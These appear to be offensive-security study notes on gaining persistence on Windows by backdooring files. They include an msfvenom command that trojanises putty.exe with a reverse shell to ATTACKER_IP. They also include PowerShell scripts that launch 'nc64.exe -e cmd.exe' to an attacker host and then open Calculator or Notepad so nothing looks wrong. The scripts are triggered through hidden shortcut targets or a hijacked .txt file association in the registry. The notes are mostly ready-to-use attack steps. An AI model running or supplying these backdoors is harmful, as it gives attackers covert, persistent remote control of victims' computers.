Backdooring Files

Executable Files

If we find any executable files having hight chance that user might use it frequently then we can download the executable to our attacking machine and modify it to run payload.

For this we can use msfvenom.

msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe

The outputed puttyX.exe will execute a reverse_tcp meterpreter payload while doing its actual job.

Shortcut Files

Instead of altering the actual executable file, we can tamper its shorcut file to execute backtoor and then execute the usual program.

In Calculator shortcut, we can change the target parameter to point to our malcious backdoor script.

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4445"

C:\Windows\System32\calc.exe

we will save this script in C:\Windows\System32\backdoor.ps1 then change the shortcut's Target Parameter as;

powershell.exe -WindowStyle hidden C:\Windows\System32\backdoor.ps1

Hijacking File Associations

We can hijack any file association to force the operating system to run a shell whenever the user opens a specific file type.

In windows, file assocations are kept inside the registry HKLM\Software\Classes

For example, .txt is associated with txtfile Programmatic ID (progid). progid is simply and identifier to a program installed ont he system.

We can further check the subkey of progid under shell\open\command

When we try to open .txt file, then system executes %SystemRoot%\system32\NOTEPAD.EXE %1, where %1 represents the name of the opened file.

We can change this parameter to execute our backdoor script.

lets create backdoor.ps1 script and save it in c:\windows

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
C:\Windows\system32\NOTEPAD.EXE $args[0]

Then edit the registry value as;

Then when .txt file is opened, out backdoor gets trigerred hence giving us shell.